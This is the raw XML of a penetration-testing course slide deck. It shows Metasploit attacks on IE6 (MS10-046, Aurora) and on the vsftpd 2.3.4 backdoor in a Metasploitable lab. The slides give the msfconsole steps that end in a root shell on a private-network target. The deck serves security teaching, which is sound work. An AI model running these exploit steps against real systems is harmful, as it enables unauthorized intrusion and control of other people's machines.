              </a:rPr>
              <a:t>Metasploit Attack: MS10-046</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="82296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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>This vulnerability is also IE’s bug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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Another example of IE6 vulnerable to ‘Drive-By Download’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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>“excellent” means even better exploit than previous MS10-018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" alt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" y="3366311"/>
            <a:ext cx="8791575" cy="34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415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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-046</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="82296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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>This vulnerability is also IE’s bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" alt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1676400"/>
            <a:ext cx="64293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389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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-046</a:t>
            </a:r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457200" y="3048000"/>
            <a:ext cx="8229600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 dirty="0"/>
              <a:t>When the vulnerable IE6 connects to the malicious webserver (http://10.0.2.15),  it will be compromised </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="18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180307"/>
            <a:ext cx="6334125" cy="2105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1" y="4191001"/>
            <a:ext cx="91440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174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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10_002_aurora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57200" y="1295400"/>
            <a:ext cx="82296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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>This vulnerability is also IE6’s bug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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Another example of IE6 vulnerable to ‘Drive-By Download’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" alt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43200"/>
            <a:ext cx="783713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883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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: Comprehensive Penetration Testing Software </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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800"/>
              <a:t>Already installed in Kali Linux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/>
              <a:t>Command line: #msfconsole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/>
              <a:t>A good Youtube tutorial on compromising Metasploitable:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=UKppQMwoMdk</a:t>
            </a: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/>
              <a:t>Step 1:  search for exploit module to vsftpd vuln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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf &gt; search vsftpd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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rank:  “great” or “excellent” are good candidates for attack!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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="819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4648200"/>
            <a:ext cx="8323262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54898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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10_002_aurora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57200" y="1295400"/>
            <a:ext cx="82296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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" alt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1295400"/>
            <a:ext cx="7105650" cy="3743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73" y="5495925"/>
            <a:ext cx="46863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742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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10_002_aurora</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="481013" y="1143000"/>
            <a:ext cx="8229600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 dirty="0"/>
              <a:t>When the vulnerable IE6 connects to the malicious webserver with the specific URL (http://10.0.2.15:8080/Qik8mzO),  it will be compromised </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="18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2166937"/>
            <a:ext cx="8020050" cy="2524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" y="4800600"/>
            <a:ext cx="5897966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154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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: vsftpd in Metasploitable Linux </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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457200" y="1600200"/>
            <a:ext cx="822960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/>
              <a:t>Step 2:  use the exploit module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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf &gt; use exploit/unix/ftp/vsftpd_234_backdoor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/>
              <a:t>Step 3:  Choose attacking payload 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/>
              <a:t>Meaning: remote shell? Remote desktop (vnc)? Remote ftp? Remote execute a command?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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf &gt; show payloads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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1024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14600"/>
            <a:ext cx="4467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724400"/>
            <a:ext cx="8108950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5849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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: vsftpd in Metasploitable Linux </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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228600" y="1295400"/>
            <a:ext cx="8458200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/>
              <a:t>Step 4:  set payload to use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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf exploit(vsftpd_234_backdoor) &gt; set payload cmd/unix/interact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/>
              <a:t>Step 5: fill in missing parameters before attack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/>
              <a:t>Remote IP? Local IP? Local port? ….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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf &gt; show options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/>
              <a:t>Result: RHOST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/>
              <a:t>Is missing, we need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/>
              <a:t>To specify remote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000"/>
              <a:t>Host IP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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229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47875"/>
            <a:ext cx="56483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241675"/>
            <a:ext cx="44958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03931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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: vsftpd in Metasploitable Linux </a:t>
            </a:r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76200" y="1295400"/>
            <a:ext cx="8458200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/>
              <a:t>Step 7:  Filling in missing parameters/options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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf exploit(vsftpd_234_backdoor) &gt; set RHOST 192.168.0.109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/>
              <a:t>Step 8: Issue Attack!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000"/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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf exploit(vsftpd_234_backdoor) &gt; exploit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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now we have a remote shell on the target with root previllege!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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1434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3352800"/>
            <a:ext cx="8477250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30788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>
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: vsftpd in Metasploitable Linux </a:t>
            </a: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342900" y="1295400"/>
            <a:ext cx="8458200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1pPr>
            <a:lvl2pPr marL="914400" indent="-457200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ea typeface="DejaVu Sans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800" dirty="0"/>
              <a:t>Now you can try the other 10 critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>!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800" dirty="0"/>
              <a:t>Summary of Operations of Metasploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Use Nmap or Nessus to find target vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the exploit module for the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the attack module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Show available payloads in the exploit module (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>show payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>you want to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Show parameters needed for the attack to go through (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the missing parameters (remote IP, ….)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Execute “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod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7212241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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> “Database not connected or cache not built”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000CC"/>
              </a:solidFill>
              <a:latin typeface="AlBattar" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="8229600" cy="485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14325" indent="-3143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32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1pPr>
            <a:lvl2pPr marL="714375" indent="-2571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8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4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14325" algn="l"/>
                <a:tab pos="771525" algn="l"/>
                <a:tab pos="1228725" algn="l"/>
                <a:tab pos="1685925" algn="l"/>
                <a:tab pos="2143125" algn="l"/>
                <a:tab pos="2600325" algn="l"/>
                <a:tab pos="3057525" algn="l"/>
                <a:tab pos="3514725" algn="l"/>
                <a:tab pos="3971925" algn="l"/>
                <a:tab pos="4429125" algn="l"/>
                <a:tab pos="4886325" algn="l"/>
                <a:tab pos="5343525" algn="l"/>
                <a:tab pos="5800725" algn="l"/>
                <a:tab pos="6257925" algn="l"/>
                <a:tab pos="6715125" algn="l"/>
                <a:tab pos="7172325" algn="l"/>
                <a:tab pos="7629525" algn="l"/>
                <a:tab pos="8086725" algn="l"/>
                <a:tab pos="8543925" algn="l"/>
                <a:tab pos="9001125" algn="l"/>
                <a:tab pos="9458325" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="FreeSans" pitchFamily="32" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle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/>
              <a:t>Issue: The search command in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> is too slow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GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>A good solution tutorial:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://miteshshah.github.io/linux/kali/how-to-fix-metasploit-database-not-connected-or-cache-not-built/</a:t>
            </a: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400" dirty="0"/>
              <a:t>Step 1: Start up PostgreSQL database services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000" dirty="0"/>
              <a:t>#service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> start</a:t>
            </a:r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400" dirty="0"/>
              <a:t>Step 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Initialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> PostgreSQL Database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000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>msfdb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init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="20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400" dirty="0"/>
              <a:t>Step 3: Rebuild database cache in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/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000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db_rebuild_cache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/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0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  <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" alt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821963"/>
            <a:ext cx="7181360" cy="75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102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7144</TotalTime>
  <Words>2269</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>359</Paragraphs>
  <Slides>41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AlBattar</vt:lpstr>
      <vt:lpstr>FreeSans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Solstice</vt:lpstr>
      <vt:lpstr>Penetration Testing       Exploiting 2: Compromising Target by Metasploit tool</vt:lpstr>
      <vt:lpstr>Acknowledgement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Malware Incident Response  Dynamic Analysis (slides courtesy of Stephen Grimes)</dc:title>
  <dc:creator>User</dc:creator>
  <cp:lastModifiedBy>Cliff Zou</cp:lastModifiedBy>
  <cp:revision>259</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-21T01:52:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-16T03:20:28Z</dcterms:modified>
</cp:coreProperties>
</file>